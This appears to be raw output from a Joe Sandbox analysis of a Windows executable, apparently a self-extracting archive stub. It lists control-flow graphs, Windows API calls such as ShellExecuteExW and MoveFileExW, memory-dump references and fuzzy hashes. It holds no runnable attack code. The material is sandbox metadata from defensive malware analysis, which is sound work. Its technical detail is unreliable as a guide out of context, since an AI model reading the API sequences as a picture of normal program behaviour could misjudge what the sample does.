                                                                                                                                              • Opcode Fuzzy Hash: 0e7799c3c6f9a9c310eb28551c36313df138bea2a9cf3f84a06edab747ba45b8
                                                                                                                                              • Instruction Fuzzy Hash: 434216B09643496FEB229F609C85FFEBB6CAB06780F104079F709A61D1C7B44965CF62

                                                                                                                                              Control-flow Graph (entry block 2efd49; legend: Executed / Not Executed; rendered graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 002EFD61
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002EFD79
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002EFD9C
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002F0047
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002F005F
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F0071
• ReadFile.KERNEL32(00000000,?,00007FFE,003128D4,00000000), ref: 002F0090
• CloseHandle.KERNEL32(00000000), ref: 002F00E8
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002F00FE
• CompareStringW.KERNEL32(00000400,00001001, )1,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002F0158
• GetFileAttributesW.KERNEL32(?,?,003128EC,00000800,?,00000000,?,00000800), ref: 002F0181
• GetFileAttributesW.KERNEL32(?,?,003129AC,00000800), ref: 002F01BA
  • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
  • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
• _swprintf.LIBCMT ref: 002F022A
• _swprintf.LIBCMT ref: 002F0276
  • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
• AllocConsole.KERNEL32 ref: 002F027E
• GetCurrentProcessId.KERNEL32 ref: 002F0288
• AttachConsole.KERNEL32(00000000), ref: 002F028F
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002F02B5
• WriteConsoleW.KERNEL32(00000000), ref: 002F02BC
• Sleep.KERNEL32(00002710), ref: 002F02C7
• FreeConsole.KERNEL32 ref: 002F02CD
• ExitProcess.KERNEL32 ref: 002F02D5
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
• String ID: )1$ *1$$+1$(,1$(-1$(.1$4*1$8)1$<+1$@,1$@-1$@.1$DXGIDebug.dll$L*1$P)1$P,1$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+1$X-1$`.1$d*1$dwmapi.dll$h)1$kernel32$l,1$p+1$p-1$t*1$t.1$uxtheme.dll$(1$+1$,1
• API String ID: 1201351596-37809703
• Opcode ID: 929e999cd4f07880c6d67b8568db74e2e664f99b2908c0d7b06d823807197661
• Instruction ID: 55d1802a92dcebf34cbf8ded6e56251dd366ae844fe4318e8cbbde4e126a48f0
• Opcode Fuzzy Hash: 929e999cd4f07880c6d67b8568db74e2e664f99b2908c0d7b06d823807197661
• Instruction Fuzzy Hash: 2BD183B50583859AD73ADF50C849BDFBBECEF8D344F50492DF68896141CBB085A8CB62

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 402 2ecfd0-2ed00b call 2fd870 call 2fd940 call 300bb8 409 2ed03e-2ed047 call 2efab1 402->409 410 2ed00d-2ed03c GetModuleFileNameW call 2eb943 call 2efa89 402->410 413 2ed04c-2ed070 call 2e943c call 2e9768 409->413 410->413 421 2ed42d-2ed433 call 2e946e 413->421 422 2ed076-2ed07e 413->422 426 2ed438-2ed449 421->426 424 2ed09c-2ed0cb call 305030 * 2 422->424 425 2ed080-2ed098 call 2f3393 * 2 422->425 435 2ed0ce-2ed0d1 424->435 436 2ed09a 425->436 437 2ed1ff-2ed222 call 2e9a4c call 302b53 435->437 438 2ed0d7-2ed0dd call 2e9b57 435->438 436->424 437->421 447 2ed228-2ed243 call 2e9979 437->447 442 2ed0e2-2ed109 call 2e9979 438->442 448 2ed10f-2ed117 442->448 449 2ed1c8-2ed1cb 442->449 463 2ed24c-2ed25f call 302b53 447->463 464 2ed245-2ed24a 447->464 451 2ed119-2ed121 448->451 452 2ed142-2ed14d 448->452 453 2ed1ce-2ed1f0 call 2e9a4c 449->453 451->452 458 2ed123-2ed13d call 305460 451->458 454 2ed14f-2ed15b 452->454 455 2ed178-2ed180 452->455 453->435 467 2ed1f6-2ed1f9 453->467 454->455 459 2ed15d-2ed162 454->459 461 2ed1ac-2ed1b0 455->461 462 2ed182-2ed18a 455->462 478 2ed1be-2ed1c6 458->478 479 2ed13f 458->479 459->455 466 2ed164-2ed176 call 304da0 459->466 461->449 469 2ed1b2-2ed1b5 461->469 462->461 468 2ed18c-2ed1a6 call 305460 462->468 463->421 483 2ed265-2ed281 call 2f0fde call 302b4e 463->483 470 2ed284-2ed28b 464->470 466->455 485 2ed1ba 466->485 467->421 467->437 468->421 468->461 469->448 474 2ed28f-2ed2b8 call 2efa56 call 302b53 470->474 475 2ed28d 470->475 492 2ed2ba-2ed2c1 call 302b4e 474->492 493 2ed2c6-2ed2d9 474->493 475->474 478->453 479->452 483->470 485->478 492->421 495 2ed2df-2ed2ed 493->495 496 2ed3c1-2ed3e4 call 2ecb33 call 302b4e * 2 493->496 497 2ed2f4-2ed2f9 495->497 533 2ed3fe-2ed42a call 305030 * 2 496->533 534 2ed3e6-2ed3fc call 2f3393 * 2 496->534 500 2ed2ff-2ed308 497->500 501 2ed5f5-2ed5fd 497->501 503 2ed30a-2ed30e 500->503 504 2ed314-2ed31b 500->504 505 2ed3bb-2ed3be 501->505 506 2ed603-2ed607 501->506 503->501 503->504 508 2ed508-2ed519 call 2ef91a 504->508 509 2ed321-2ed346 504->509 505->496 510 2ed609-2ed60f 506->510 511 2ed657-2ed65d 506->511 535 2ed5ef-2ed5f2 508->535 536 2ed51f-2ed548 call 2efab1 call 304e1d 508->536 515 2ed349-2ed36e call 302b33 call 304da0 509->515 516 2ed615-2ed61c 510->516 517 2ed3b2-2ed3b5 510->517 513 2ed65f-2ed665 511->513 514 2ed683-2ed69d call 2ecb33 511->514 513->514 520 2ed667-2ed66d 513->520 538 2ed67b-2ed67e 514->538 552 2ed386 515->552 553 2ed370-2ed37a 515->553 523 2ed61e-2ed621 516->523 524 2ed643 516->524 517->497 517->505 520->517 528 2ed673-2ed67a 520->528 531 2ed63f-2ed641 523->531 532 2ed623-2ed626 523->532 527 2ed645-2ed652 524->527 527->517 528->538 531->527 540 2ed63b-2ed63d 532->540 541 2ed628-2ed62b 532->541 533->421 534->533 535->501 536->535 561 2ed54e-2ed5b5 call 2f11fa call 2efa56 call 2efa2f call 2efa56 call 304e71 536->561 540->527 547 2ed62d-2ed631 541->547 548 2ed637-2ed639 541->548 547->520 554 2ed633-2ed635 547->554 548->527 559 2ed389-2ed38d 552->559 553->552 558 2ed37c-2ed384 553->558 554->527 558->559 559->515 562 2ed38f-2ed396 559->562 595 2ed5b7-2ed5c0 561->595 596 2ed5c3-2ed5d8 561->596 564 2ed44c-2ed44f 562->564 565 2ed39c-2ed3aa call 2efa56 562->565 564->508 568 2ed455-2ed45c 564->568 569 2ed3af 565->569 571 2ed45e-2ed462 568->571 572 2ed464-2ed465 568->572 569->517 571->572 574 2ed467-2ed475 571->574 572->568 576 2ed496-2ed4bb call 2f11fa 574->576 577 2ed477-2ed47a 574->577 584 2ed4de-2ed4e6 576->584 585 2ed4bd-2ed4d9 call 302b69 576->585 580 2ed47c-2ed491 577->580 581 2ed493 577->581 580->577 580->581 581->576 588 2ed4ed-2ed503 call 2ed9dc 584->588 589 2ed4e8 584->589 585->569 588->569 589->588 595->596 597 2ed5d9-2ed5e0 596->597 598 2ed5ec-2ed5ed 597->598 599 2ed5e2-2ed5e6 597->599 598->597 599->569 599->598
APIs
• __EH_prolog.LIBCMT ref: 002ECFD9
• _wcschr.LIBVCRUNTIME ref: 002ECFFA
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002ED015
• __fprintf_l.LIBCMT ref: 002ED4FB
  • Part of subcall function 002F0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002EB312,00000000,?,?,?,000104A4), ref: 002F0FFA
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
• String ID: $ ,$$%s:$(&1$*messages***$*messages***$8&1$@%s:$H&1$R$RTL$T&1$a
• API String ID: 4184910265-534355219
• Opcode ID: a73575b7e16ac452b450622f2527d4b3dd4f45a32c1625ca2ef41d38fa4eeb79
• Instruction ID: 75e34b2326a9dd0c911a288d5427c5c88eea41984f71c4565607b8406b70a803
• Opcode Fuzzy Hash: a73575b7e16ac452b450622f2527d4b3dd4f45a32c1625ca2ef41d38fa4eeb79
• Instruction Fuzzy Hash: EE12E1716903899BDF25EFA5CC45AEE37A9FF04300F90016AF9099B291EB71D9A1CF50

Control-flow Graph

APIs
  • Part of subcall function 002FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
  • Part of subcall function 002FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
  • Part of subcall function 002FA388: IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
  • Part of subcall function 002FA388: TranslateMessage.USER32(?), ref: 002FA3CC
  • Part of subcall function 002FA388: DispatchMessageW.USER32(?), ref: 002FA3D6
• GetDlgItem.USER32(00000068,0033DE38), ref: 002FC1A4
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,002F9D8F), ref: 002FC1CF
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002FC1DE
• SendMessageW.USER32(00000000,000000C2,00000000,003122E4), ref: 002FC1E8
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002FC1FE
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002FC214
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002FC254
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002FC25E
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002FC26D
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002FC290
• SendMessageW.USER32(00000000,000000C2,00000000,0031304C), ref: 002FC29B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
• Opcode ID: fe53775577cc9f55c291d32b4d7a0a3799b6545b99abfba0fceaadafd4ea38c3
• Instruction ID: d2829a8f107ef9a0959be03aa77990d55b0e40e64c6dd5e5ea6a9f2b9ab4e159
• Opcode Fuzzy Hash: fe53775577cc9f55c291d32b4d7a0a3799b6545b99abfba0fceaadafd4ea38c3
• Instruction Fuzzy Hash: 052146712493083BE312EF248C41FAFBBDCEF86754F100618FA90961D1C7A55A0A8AB7

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 611 2fc431-2fc449 call 2fd940 614 2fc44f-2fc45b call 302b33 611->614 615 2fc695-2fc69d 611->615 614->615 618 2fc461-2fc489 call 2fe920 614->618 621 2fc48b 618->621 622 2fc493-2fc4a0 618->622 621->622 623 2fc4a4-2fc4ad 622->623 624 2fc4a2 622->624 625 2fc4af-2fc4b1 623->625 626 2fc4e5 623->626 624->623 627 2fc4b9-2fc4bc 625->627 628 2fc4e9-2fc4eb 626->628 629 2fc649-2fc64e 627->629 630 2fc4c2-2fc4ca 627->630 631 2fc4ed-2fc4f0 628->631 632 2fc4f2-2fc4f4 628->632 633 2fc643-2fc647 629->633 634 2fc650 629->634 635 2fc662-2fc66a 630->635 636 2fc4d0-2fc4d6 630->636 631->632 637 2fc507-2fc519 call 2eb153 631->637 632->637 638 2fc4f6-2fc4fd 632->638 633->629 641 2fc655-2fc659 633->641 634->641 643 2fc66c-2fc66e 635->643 644 2fc672-2fc67a 635->644 636->635 642 2fc4dc-2fc4e3 636->642 646 2fc51b-2fc528 call 2f1410 637->646 647 2fc532-2fc53d call 2e9e6b 637->647 638->637 639 2fc4ff 638->639 639->637 641->635 642->626 642->627 643->644 644->628 646->647 652 2fc52a 646->652 653 2fc53f-2fc556 call 2eaed7 647->653 654 2fc55a-2fc567 ShellExecuteExW 647->654 652->647 653->654 656 2fc56d-2fc580 654->656 657 2fc693-2fc694 654->657 658 2fc593-2fc595 656->658 659 2fc582-2fc589 656->659 657->615 662 2fc5a8-2fc5c7 WaitForInputIdle call 2fc8f0 658->662 663 2fc597-2fc5a0 IsWindowVisible 658->663 659->658 661 2fc58b-2fc591 659->661 661->658 664 2fc5fe-2fc60a CloseHandle 661->664 662->664 672 2fc5c9-2fc5d1 662->672 663->662 665 2fc5a2-2fc5a6 ShowWindow 663->665 668 2fc60c-2fc619 call 2f1410 664->668 669 2fc61b-2fc629 664->669 665->662 668->669 679 2fc67f 668->679 670 2fc62b-2fc62d 669->670 671 2fc686-2fc688 669->671 670->671 676 2fc62f-2fc635 670->676 671->657 674 2fc68a-2fc68c 671->674 672->664 677 2fc5d3-2fc5e4 GetExitCodeProcess 672->677 674->657 678 2fc68e-2fc691 ShowWindow 674->678 676->671 680 2fc637-2fc641 676->680 677->664 681 2fc5e6-2fc5f0 677->681 678->657 679->671 680->671 682 2fc5f7 681->682 683 2fc5f2 681->683 682->664 683->682
APIs
• ShellExecuteExW.SHELL32(000001C0), ref: 002FC55F
• IsWindowVisible.USER32(?), ref: 002FC598
• ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 002FC5A4
• WaitForInputIdle.USER32(?,000007D0), ref: 002FC5B1
• GetExitCodeProcess.KERNEL32(?,?), ref: 002FC5DC
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FC602
• ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 002FC691
  • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
• String ID: $.exe$.inf
• API String ID: 1693144567-2452507128
• Opcode ID: a0c7593521739462d13062572ac087d7875eca9614ba3ec3723f61390e2bcb95
• Instruction ID: 1ca8eada7dafd25f10a11728a7b48239fea71183dc658dd9362a97d4dcd7c0b5
• Opcode Fuzzy Hash: a0c7593521739462d13062572ac087d7875eca9614ba3ec3723f61390e2bcb95
• Instruction Fuzzy Hash: B751F97042838E9AD7329F20DA50ABBF7ECAFC5384F64083DE6C1A7151D7B19964CB52

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 684 3095a5-3095be 685 3095c0-3095d0 call 30dbbc 684->685 686 3095d4-3095d9 684->686 685->686 693 3095d2 685->693 688 3095e6-30960a MultiByteToWideChar 686->688 689 3095db-3095e3 686->689 691 309610-30961c 688->691 692 30979d-3097b0 call 2fe203 688->692 689->688 694 309670 691->694 695 30961e-30962f 691->695 693->686 697 309672-309674 694->697 698 309631-309640 call 310ee0 695->698 699 30964e-30965f call 307a8a 695->699 701 309792 697->701 702 30967a-30968d MultiByteToWideChar 697->702 698->701 711 309646-30964c 698->711 699->701 712 309665 699->712 706 309794-30979b call 30980d 701->706 702->701 705 309693-3096a5 call 309c64 702->705 714 3096aa-3096ae 705->714 706->692 713 30966b-30966e 711->713 712->713 713->697 714->701 716 3096b4-3096bb 714->716 717 3096f5-309701 716->717 718 3096bd-3096c2 716->718 720 309703-309714 717->720 721 30974d 717->721 718->706 719 3096c8-3096ca 718->719 719->701 724 3096d0-3096ea call 309c64 719->724 722 309716-309725 call 310ee0 720->722 723 30972f-309740 call 307a8a 720->723 725 30974f-309751 721->725 730 30978b-309791 call 30980d 722->730 736 309727-30972d 722->736 723->730 738 309742 723->738 724->706 739 3096f0 724->739 729 309753-30976c call 309c64 725->729 725->730 729->730 742 30976e-309775 729->742 730->701 741 309748-30974b 736->741 738->741 739->701 741->725 743 3097b1-3097b7 742->743 744 309777-309778 742->744 745 309779-309789 WideCharToMultiByte 743->745 744->745 745->730 746 3097b9-3097c0 call 30980d 745->746 746->706
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0030451B,0030451B,?,?,?,003097F6,00000001,00000001,31E85006), ref: 003095FF
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003097F6,00000001,00000001,31E85006,?,?,?), ref: 00309685
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0030977F
                                                                                                                                              • __freea.LIBCMT ref: 0030978C
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              • __freea.LIBCMT ref: 00309795
                                                                                                                                              • __freea.LIBCMT ref: 003097BA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 1414292761-2989149754
                                                                                                                                              • Opcode ID: 8a403297aa16593fdd6282a6905afbef7bbe7a2756121589ccf1d329cbfd0102
                                                                                                                                              • Instruction ID: df11a0c870b5550491a6d5f943a3b9cb22c86cb90313d5f09ade004d905cc441
                                                                                                                                              • Opcode Fuzzy Hash: 8a403297aa16593fdd6282a6905afbef7bbe7a2756121589ccf1d329cbfd0102
                                                                                                                                              • Instruction Fuzzy Hash: 0D51F673612216ABDB278E60CCA1FAB77ADEB44B50F16462AFD04D61D2EB34DC40C690

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 749 2fbb5b-2fbb5e 750 2fbcdf-2fbce2 749->750 751 2fbb64-2fbb89 GetTempPathW call 2eaea5 749->751 753 2fbce8-2fbcef 750->753 754 2fc093-2fc0be call 2fa156 750->754 759 2fbb8d-2fbbb9 call 2e3e41 call 2e9e6b 751->759 756 2fbcfb-2fbd02 753->756 757 2fbcf1 753->757 762 2fb51b-2fb529 754->762 763 2fc0c4-2fc0d4 754->763 756->754 757->756 772 2fbb8b-2fbb8c 759->772 773 2fbbbb-2fbbd3 SetDlgItemTextW 759->773 766 2fb52a-2fb53a call 2f9e24 762->766 771 2fb53c 766->771 774 2fb53e-2fb553 call 2f1410 771->774 772->759 773->754 775 2fbbd9-2fbbe0 773->775 780 2fb555-2fb559 774->780 781 2fb560-2fb563 774->781 775->754 777 2fbbe6-2fbc01 call 300bb8 775->777 785 2fbc55-2fbc5d 777->785 786 2fbc03-2fbc0e 777->786 780->774 783 2fb55b 780->783 781->754 784 2fb569 781->784 783->754 789 2fb75f-2fb761 784->789 790 2fb81d-2fb81f 784->790 791 2fb570-2fb573 784->791 792 2fb800-2fb802 784->792 787 2fbc8f-2fbcbf call 2f9c4f call 2f9735 785->787 788 2fbc5f-2fbc8a call 2efab1 * 2 785->788 786->785 793 2fbc10-2fbc12 786->793 787->754 829 2fbcc5-2fbcd9 EndDialog 787->829 788->787 789->754 800 2fb767-2fb773 789->800 790->754 797 2fb825-2fb82c 790->797 791->754 798 2fb579-2fb5e6 call 2f95f8 call 2eb625 call 2ea188 call 2ea2c2 call 2e6ef9 call 2ea215 791->798 792->754 796 2fb808-2fb818 SetWindowTextW 792->796 799 2fbc18-2fbc1c 793->799 796->754 797->754 803 2fb832-2fb84b 797->803 877 2fb5ec-2fb5f2 798->877 878 2fb74b-2fb75a call 2ea19e 798->878 805 2fbc1e-2fbc2d 799->805 806 2fbc31-2fbc4d call 2efab1 799->806 807 2fb787-2fb78c 800->807 808 2fb775-2fb786 call 3066ed 800->808 813 2fb84d 803->813 814 2fb853-2fb861 call 302b33 803->814 805->799 816 2fbc2f 805->816 806->785 809 2fb78e-2fb794 807->809 810 2fb796-2fb7a1 call 2fa2ae 807->810 808->807 819 2fb7a6-2fb7a8 809->819 810->819 813->814 814->754 832 2fb867-2fb870 814->832 816->785 827 2fb7aa-2fb7b1 call 302b33 819->827 828 2fb7b3-2fb7d3 call 302b33 call 302b5e 819->828 827->828 855 2fb7ec-2fb7ee 828->855 856 2fb7d5-2fb7dc 828->856 829->750 837 2fb899-2fb89c 832->837 838 2fb872-2fb876 832->838 843 2fb8a2-2fb8a5 837->843 844 2fb981-2fb98f call 2efab1 837->844 838->837 842 2fb878-2fb880 838->842 842->754 848 2fb886-2fb894 call 2efab1 842->848 849 2fb8a7-2fb8ac 843->849 850 2fb8b2-2fb8cd 843->850 858 2fb991-2fb9a5 call 300d9b 844->858 848->858 849->844 849->850 868 2fb8cf-2fb909 850->868 869 2fb917-2fb91e 850->869 855->754 859 2fb7f4-2fb7fb call 302b4e 855->859 862 2fb7de-2fb7e0 856->862 863 2fb7e3-2fb7eb call 3066ed 856->863 879 2fb9a7-2fb9ab 858->879 880 2fb9b2-2fba0e call 2efab1 call 2f9ffc GetDlgItem SetWindowTextW SendMessageW call 302b69 858->880 859->754 862->863 863->855 896 2fb90d-2fb90f 868->896 897 2fb90b 868->897 871 2fb94c-2fb96f call 302b33 * 2 869->871 872 2fb920-2fb938 call 302b33 869->872 871->858 908 2fb971-2fb97f call 2efa89 871->908 872->871 890 2fb93a-2fb947 call 2efa89 872->890 884 2fb5f9-2fb60e SetFileAttributesW 877->884 878->754 879->880 885 2fb9ad-2fb9af 879->885 880->754 919 2fba14-2fba26 SendMessageW 880->919 891 2fb6b4-2fb6c0 GetFileAttributesW 884->891 892 2fb614-2fb647 call 2eb1b7 call 2eaea5 call 302b33 884->892 885->880 890->871 901 2fb6c2-2fb6d1 DeleteFileW 891->901 902 2fb730-2fb745 call 2ea215 891->902 925 2fb65a-2fb668 call 2eb5e5 892->925 926 2fb649-2fb658 call 302b33 892->926 896->869 897->896 901->902 907 2fb6d3-2fb6d6 901->907 902->878 916 2fb5f4 902->916 912 2fb6da-2fb706 call 2e3e41 GetFileAttributesW 907->912 908->858 923 2fb6d8-2fb6d9 912->923 924 2fb708-2fb71e MoveFileW 912->924 916->884 919->754 923->912 924->902 927 2fb720-2fb72a MoveFileExW 924->927 925->878 932 2fb66e-2fb6ae call 302b33 call 2fe920 SHFileOperationW 925->932 926->925 926->932 927->902 932->891
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 002FBB71
                                                                                                                                              • _swprintf.LIBCMT ref: 002FBBA5
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,003285FA), ref: 002FBBC5
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002FBBF8
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FBCD9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                              • String ID: %s%s%u
                                                                                                                                              • API String ID: 2892007947-1360425832
                                                                                                                                              • Opcode ID: 1fa95587f2e275146a031f707f17ef4c9d30571d77bd53f2f1a94f3756771b98
                                                                                                                                              • Instruction ID: 80bde9463ea289b25462c02200278b7e5325d9b2485556cc0c04c46dd5b2a945
                                                                                                                                              • Opcode Fuzzy Hash: 1fa95587f2e275146a031f707f17ef4c9d30571d77bd53f2f1a94f3756771b98
                                                                                                                                              • Instruction Fuzzy Hash: 44419D7191021EAEEF26DF60CD84FEEB7BCAB19344F1040B6E609E6150EF708A948F50

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 937 2f9a32-2f9a51 GetClassNameW 938 2f9a79-2f9a7b 937->938 939 2f9a53-2f9a68 call 2f1410 937->939 940 2f9a7d-2f9a7f 938->940 941 2f9a86-2f9a8a 938->941 944 2f9a6a-2f9a76 FindWindowExW 939->944 945 2f9a78 939->945 940->941 944->945 945->938
                                                                                                                                              APIs
